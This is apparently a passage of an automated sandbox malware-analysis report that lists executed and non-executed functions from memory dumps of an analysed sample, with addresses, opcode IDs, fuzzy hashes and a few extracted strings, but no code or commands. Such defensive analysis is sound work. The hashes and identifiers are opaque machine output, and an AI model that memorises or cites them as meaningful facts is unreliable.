                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b797000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9e33fe1c19cad52db4d86dec947426a2aa2b01fb7aba7d67195256b4932e2bc0
                                                                                                                    • Instruction ID: 842222537c80b4394f15540629b873d6542be7f63e319c74a484342c6911ca5f
                                                                                                                    • Opcode Fuzzy Hash: 9e33fe1c19cad52db4d86dec947426a2aa2b01fb7aba7d67195256b4932e2bc0
                                                                                                                    • Instruction Fuzzy Hash: 3BF0ED30C1D20C9FDB10EFA8848DAEA7FB0FF28304F4104BAE808C60A1DB389690CB01
                                                                                                                    Function 00007FFD9B7DBD70 Relevance: .0, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8c481962b95942042eca2685ebc198f6ea4c5579dcb4a02654baf04b7e30a161
                                                                                                                    • Instruction ID: 722afae380d560fa3848eee79de9e8eb196fc3cc1c83d2a21c87338faf3d8ca5
                                                                                                                    • Opcode Fuzzy Hash: 8c481962b95942042eca2685ebc198f6ea4c5579dcb4a02654baf04b7e30a161
                                                                                                                    • Instruction Fuzzy Hash: A2E06871A09B0C4BDF90AB6898206D43BA0FFC5384F05016AE00CCA2A0D2225958C315
                                                                                                                    Function 00007FFD9B7D1F1C Relevance: .0, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a760aa818c24b6851900c6f920156686037a6156592ea2b7080bf76d883e7d62
                                                                                                                    • Instruction ID: 549aab493ae773c9cd248e0ee45a9ca2458253094b42e75c595002c0ee836f29
                                                                                                                    • Opcode Fuzzy Hash: a760aa818c24b6851900c6f920156686037a6156592ea2b7080bf76d883e7d62
                                                                                                                    • Instruction Fuzzy Hash: 8AF0DA30E0961E8BEB64DB50C860AECB375FBD5351F5143A9C01E976A5DE746B88CF40
                                                                                                                    Function 00007FFD9B7A118A Relevance: .0, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B79B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b79b000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 780082604afa3cbbbeb7be207bf2026a615fa0525e74baa810785a088920829b
                                                                                                                    • Instruction ID: 2c9c6df53c8e97450598445fe4ec5cb1f8cfc0dee9ab39cd9f5651de77aa2256
                                                                                                                    • Opcode Fuzzy Hash: 780082604afa3cbbbeb7be207bf2026a615fa0525e74baa810785a088920829b
                                                                                                                    • Instruction Fuzzy Hash: 5CF07070E1E64ECEFBB49BA4C4557FDBAE0AF55305F210679D00DA66B2D9741680CA00
                                                                                                                    Function 00007FFD9B7D248C Relevance: .0, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d22ef885e565ad579f0450ef5cbb390a6608bc65c902566d443fa63596face75
                                                                                                                    • Instruction ID: 4d8ae532ab1854800d6146e5dee8eacbfd095c624cc1db20ada6ca6ed939f8b8
                                                                                                                    • Opcode Fuzzy Hash: d22ef885e565ad579f0450ef5cbb390a6608bc65c902566d443fa63596face75
                                                                                                                    • Instruction Fuzzy Hash: C2F03A30A0522E8FE764DF40C8647A9B3B2FB90355F8082B9C10D966A1DF792A88DF40
                                                                                                                    Function 00007FFD9B7866D2 Relevance: .0, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b780000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: eb420523804b783ba557b3ee00fa0c278e3bbcdf839eacbabcb5729b961635f6
                                                                                                                    • Instruction ID: 3d884007092b4052457ea12eadfca8a4c822e8c4b6c7fde9f7ad8b298e046669
                                                                                                                    • Opcode Fuzzy Hash: eb420523804b783ba557b3ee00fa0c278e3bbcdf839eacbabcb5729b961635f6
                                                                                                                    • Instruction Fuzzy Hash: 36E01270D4DA1D8AFBB49A64D8997F973B0DF04312F1100F8C10D62290CE381BC19F01
                                                                                                                    Function 00007FFD9B7D6C67 Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1e6336cf6dd35a35daed5b58340fae3b81b7609a0dda15a44d22827c70dae170
                                                                                                                    • Instruction ID: 43347f8260e30e012ae381da1dc8c3e0b9cf119449c9c6cba53519e97646aad2
                                                                                                                    • Opcode Fuzzy Hash: 1e6336cf6dd35a35daed5b58340fae3b81b7609a0dda15a44d22827c70dae170
                                                                                                                    • Instruction Fuzzy Hash: 8ED0C965B0561E4EDB64DA5884B47A433E2EF55360F9002B5944C96166DB3469858A10

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FFD9B7D7F89 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $&$2$k5H&
                                                                                                                    • API String ID: 0-788068028
                                                                                                                    • Opcode ID: 6d9f1c4e6a55fbfd6bd04f216623554583a314065adf5fa25cb1eb46f1b5be60
                                                                                                                    • Instruction ID: f1b31b0e7a8e8f587d7986941eb7e142da01be491d4bb9a02376f845ff1d651a
                                                                                                                    • Opcode Fuzzy Hash: 6d9f1c4e6a55fbfd6bd04f216623554583a314065adf5fa25cb1eb46f1b5be60
                                                                                                                    • Instruction Fuzzy Hash: C811E97090525CCFEB69DF94C4A97A877B1EB94345F51466EC00AAB2E0CB795985CF00

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9B770DA7 Relevance: .3, Instructions: 295COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 82c7bdf437b769804ebfb4abb9500ab14447a605e0ff07184466ddd2852a209c
                                                                                                                    • Instruction ID: a93f5313dca76f45b2d0195ab44f4d23af614a5d3447eb74cea95cedd2464de2
                                                                                                                    • Opcode Fuzzy Hash: 82c7bdf437b769804ebfb4abb9500ab14447a605e0ff07184466ddd2852a209c
                                                                                                                    • Instruction Fuzzy Hash: ADA1C171A18A9D8FEB98DFA8C8657A97FE1FF55310F1101BAD049D37E6CEB828118740
                                                                                                                    Function 00007FFD9B773FC1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: o
                                                                                                                    • API String ID: 0-252678980
                                                                                                                    • Opcode ID: 71eb2d992100738c59f6847dfb6bfd8702a0fe87070b237d0dc4407aba11f9ae
                                                                                                                    • Instruction ID: b89b0900a26d69065f4ad539e2169d355d3c59dd6cb674e0dc04b7289f4bbe9c
                                                                                                                    • Opcode Fuzzy Hash: 71eb2d992100738c59f6847dfb6bfd8702a0fe87070b237d0dc4407aba11f9ae
                                                                                                                    • Instruction Fuzzy Hash: A5111F70E0665E8FEB78DF04C8A46EC73B2EB50315F1142FAD51DA72A5CA741E858F44
                                                                                                                    Function 00007FFD9B7708D0 Relevance: .2, Instructions: 181COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e8d241963e1b4619e91519095ce31cfacb9f7a4f77f708dc96d876141aa1a9dc
                                                                                                                    • Instruction ID: 0b8c1d0bb4a31fe0bf0fca51743614b35f1307594d4364dad05605388730ad06
                                                                                                                    • Opcode Fuzzy Hash: e8d241963e1b4619e91519095ce31cfacb9f7a4f77f708dc96d876141aa1a9dc
                                                                                                                    • Instruction Fuzzy Hash: AB51A232E08A5D8FDB54EFA8D4A4AFDBBA1EF58315F0405BAD049D7196CF246841CB80
                                                                                                                    Function 00007FFD9B770960 Relevance: .1, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b33f30a6723384ecde67135fc61640de7ed0051c2501f2fcf569d11b4c28b89c
                                                                                                                    • Instruction ID: f0414b882be82f593187d0d02c35a37d8726fc0067bbc3392d5a1e891808c474
                                                                                                                    • Opcode Fuzzy Hash: b33f30a6723384ecde67135fc61640de7ed0051c2501f2fcf569d11b4c28b89c
                                                                                                                    • Instruction Fuzzy Hash: F1414D31E18A5D8FDB54EF98D4A5AEDB7E1FF58315F10067AE40DD32A6CE34A8418B80
                                                                                                                    Function 00007FFD9B770908 Relevance: .1, Instructions: 133COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 294efd11ba3d33bbac5eed2238aa73e31fd1080be140e4ec7bc5b221a1348168
                                                                                                                    • Instruction ID: eebe0afcc66ca5150fa6c5a5b7e298676470cd1c5985840f6168a2c9604c8518
                                                                                                                    • Opcode Fuzzy Hash: 294efd11ba3d33bbac5eed2238aa73e31fd1080be140e4ec7bc5b221a1348168
                                                                                                                    • Instruction Fuzzy Hash: 6C519D30A08A0E9FCF84EF98D484EED7BF1FF58355B150269E419E7260DA30E990CB81
                                                                                                                    Function 00007FFD9B770998 Relevance: .1, Instructions: 113COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 57d678b68a0dfe2f4849bfa4c45cb0ef5f8d2081569f7d5389fc602d340975f5
                                                                                                                    • Instruction ID: 5fd6fef3b7c7c125feaf0e74f12c8c3f99d373f2541896771e12d69af4a6710b
                                                                                                                    • Opcode Fuzzy Hash: 57d678b68a0dfe2f4849bfa4c45cb0ef5f8d2081569f7d5389fc602d340975f5
                                                                                                                    • Instruction Fuzzy Hash: 68410930E14A5D8FDB94EF98C4A5AEDB7F1FF58301F11027AD409E32A5DA34A8418B40
                                                                                                                    Function 00007FFD9B77705A Relevance: .1, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d70e7579a4df0dfca47b25ddfa6a55914fd86871f9c0515a0dc5f6ba9d31d72d
                                                                                                                    • Instruction ID: 5113a3dc3ff3f99ba2bb823ccf9273e355d935ca3cec9a4c2f9b1a85a6a166e4
                                                                                                                    • Opcode Fuzzy Hash: d70e7579a4df0dfca47b25ddfa6a55914fd86871f9c0515a0dc5f6ba9d31d72d
                                                                                                                    • Instruction Fuzzy Hash: 4D41A770E1AA1D8EEBA4EB58C8A8AE9B7B1FF58341F5501E5D00DD31B1DA746A818F01
                                                                                                                    Function 00007FFD9B774FB8 Relevance: .1, Instructions: 89COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b6330538fa91cc0aada6b018ffea31d1b5ecb5883cf58f7e973598b9e2dd4302
                                                                                                                    • Instruction ID: d20b7586b091c911bd85f3db35bd37be5e1d1ad61ffae0e1a268dcf3d6db475b
                                                                                                                    • Opcode Fuzzy Hash: b6330538fa91cc0aada6b018ffea31d1b5ecb5883cf58f7e973598b9e2dd4302
                                                                                                                    • Instruction Fuzzy Hash: DC318975A04A1C8FDFA4DF14C895AE9B7F1FBA5305F1001EAD00EE36A4CA759A85CF42
                                                                                                                    Function 00007FFD9B770C25 Relevance: .1, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3d3050c1c5e9dd5248e6255bc8fdd72d776f5de364c1a3809f15baadef79a114
                                                                                                                    • Instruction ID: b5ebef1ab6163c9aee921d4eec3ec871c1e0df9425dc84f1585117b0c78a4db6
                                                                                                                    • Opcode Fuzzy Hash: 3d3050c1c5e9dd5248e6255bc8fdd72d776f5de364c1a3809f15baadef79a114
                                                                                                                    • Instruction Fuzzy Hash: F4213A36B0E78D4FEB2296A8DC641ED7B60EF92311F0606B3C144CB1F2DA741609C791
                                                                                                                    Function 00007FFD9B7711A2 Relevance: .1, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4f7d7a6796eaf697657349f75f3bc7ee41cceed4d8c93c5fa43f70bb731f577d
                                                                                                                    • Instruction ID: 5259a6fc6d899737c24dd22cad6a72bf5d28f712c5ce90087b7429bc3752d5ff
                                                                                                                    • Opcode Fuzzy Hash: 4f7d7a6796eaf697657349f75f3bc7ee41cceed4d8c93c5fa43f70bb731f577d
                                                                                                                    • Instruction Fuzzy Hash: F821FC30A1891D8FEB94EFA8C8959ADB7F1FF68300B11067AD419D72B1DB74A941CB40
                                                                                                                    Function 00007FFD9B770C38 Relevance: .1, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9f78773fd445ad612beb61878ddbb9856f69da7c1fe3164457c4d175f13ca7e3
                                                                                                                    • Instruction ID: c686b298169176ac578691bfa5c01e10484c402012429081c8a956a6a4195994
                                                                                                                    • Opcode Fuzzy Hash: 9f78773fd445ad612beb61878ddbb9856f69da7c1fe3164457c4d175f13ca7e3
                                                                                                                    • Instruction Fuzzy Hash: A0110836B0E79E4FEB129AA4CC642E97770EB52310F0646B3C141DB1F2DA7816098791
                                                                                                                    Function 00007FFD9B770B7F Relevance: .1, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a8fb13b799f3500fb2e0cec0523cd8a7692e0cf5622b1e0afb3e4fb41a7be19e
                                                                                                                    • Instruction ID: 7bc1fd35e437c46d275147d54d1c98cbf64af45f5c333c4489495cbb7c278ff3
                                                                                                                    • Opcode Fuzzy Hash: a8fb13b799f3500fb2e0cec0523cd8a7692e0cf5622b1e0afb3e4fb41a7be19e
                                                                                                                    • Instruction Fuzzy Hash: 30115A3162964DCFCF44EF68C891AEA77A0FF58308F0502AAE84CD7261C730A565CB81
                                                                                                                    Function 00007FFD9B770C40 Relevance: .1, Instructions: 53COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0e9f953c9d4729b13868781c2c1cfb20fc1816158570eb55556e569a0ab91674
                                                                                                                    • Instruction ID: 98a0464d54e6a20e05393960ebc395bb3d04f51d11fa1f786745829aea858b02
                                                                                                                    • Opcode Fuzzy Hash: 0e9f953c9d4729b13868781c2c1cfb20fc1816158570eb55556e569a0ab91674
                                                                                                                    • Instruction Fuzzy Hash: B9110A35B0E78D4FEB129B64C8642E97B70EF42310F0646B3C051DB1F2CA781609CB51
                                                                                                                    Function 00007FFD9B770C50 Relevance: .0, Instructions: 42COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c6c49fad276c4f8485f98b12ff0fe8cbf7d70218a121f1896bd0bb0fefafa06a
                                                                                                                    • Instruction ID: 74c6f3c91310fc16c54a3132d11dfdda283abf2acdb9c3ac412a414b575d49f4
                                                                                                                    • Opcode Fuzzy Hash: c6c49fad276c4f8485f98b12ff0fe8cbf7d70218a121f1896bd0bb0fefafa06a
                                                                                                                    • Instruction Fuzzy Hash: 62018435A0E7CE8EEB129BA488642E97B70EB52304F0546B7D451DB1F2DA785618C741
                                                                                                                    Function 00007FFD9B7706AD Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ff0d9f6c14b398dd1c69815fba983371f23b3d456135e03a6b4deb66394a144a
                                                                                                                    • Instruction ID: 76b384ce2c27a90dcd5972a2207543f5f8d8fb784a1f1b64d8bf30344a5eb844
                                                                                                                    • Opcode Fuzzy Hash: ff0d9f6c14b398dd1c69815fba983371f23b3d456135e03a6b4deb66394a144a
                                                                                                                    • Instruction Fuzzy Hash: CCF06D30E05A4E8EEF90EF9894986EE77A0FB54701F110136E80CD21B0CA7066908B80
                                                                                                                    Function 00007FFD9B7713E0 Relevance: .0, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ba4266b8718878a7892dd949a29cafb57bb321e6e09fc5d258b768d816cb2184
                                                                                                                    • Instruction ID: 380cb03941733ad05ceea65d84f184f214deccad8ab82c3fda65312735fedbab
                                                                                                                    • Opcode Fuzzy Hash: ba4266b8718878a7892dd949a29cafb57bb321e6e09fc5d258b768d816cb2184
                                                                                                                    • Instruction Fuzzy Hash: 02F0BD70914A4D9FDF94EF58D888EAA7BE0FF28305F1145A5F818D3264D630E590CB80
                                                                                                                    Function 00007FFD9B7706D0 Relevance: .0, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8eb1510e87bc7f88bdadf47b7651bf464182869d8a8450ce48c57fbd74f9ef93
                                                                                                                    • Instruction ID: fb1ac73437ad2f7709bf2b4c7d06c205b47e28757db0defdede578f0a19d478c
                                                                                                                    • Opcode Fuzzy Hash: 8eb1510e87bc7f88bdadf47b7651bf464182869d8a8450ce48c57fbd74f9ef93
                                                                                                                    • Instruction Fuzzy Hash: 8CF0FE30D15A4E9FEB90EFA494496EA77E1FB14305F110566E818D21A0DA70A6A08B80
                                                                                                                    Function 00007FFD9B7766D2 Relevance: .0, Instructions: 27COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 176f32b092650aaa9c03085f6199232841bd254698e5009ef9b55d3b40f0cc9c
                                                                                                                    • Instruction ID: e314bf59d1d39c7d0a385c2d0ca3a833ce5c6093504ea9d0ba7881e87a9c5f1b
                                                                                                                    • Opcode Fuzzy Hash: 176f32b092650aaa9c03085f6199232841bd254698e5009ef9b55d3b40f0cc9c
                                                                                                                    • Instruction Fuzzy Hash: 97F06B70D4A61D8EEBB4DA54DC957E9B3B1EB54312F1151EAC00DA32A1DE741A808F01

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FFD9B7709B0 Relevance: 5.2, Strings: 4, Instructions: 185COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1958306772.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ffd9b770000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                                    • API String ID: 0-1692736845
                                                                                                                    • Opcode ID: b4b380c6878429f07851a87fe0822f289316f507976edbf17d111fe30d59a835
                                                                                                                    • Instruction ID: 1ef5103914fbbd5dbcb7139224abac2267b96343e71bf3ea3d635ac066c948b7
                                                                                                                    • Opcode Fuzzy Hash: b4b380c6878429f07851a87fe0822f289316f507976edbf17d111fe30d59a835
                                                                                                                    • Instruction Fuzzy Hash: 8E51D00BB8D66649E31933FC75619FDAB86CFA0379B0847B7F15E8A0D74E48208187D5

                                                                                                                    Executed Functions

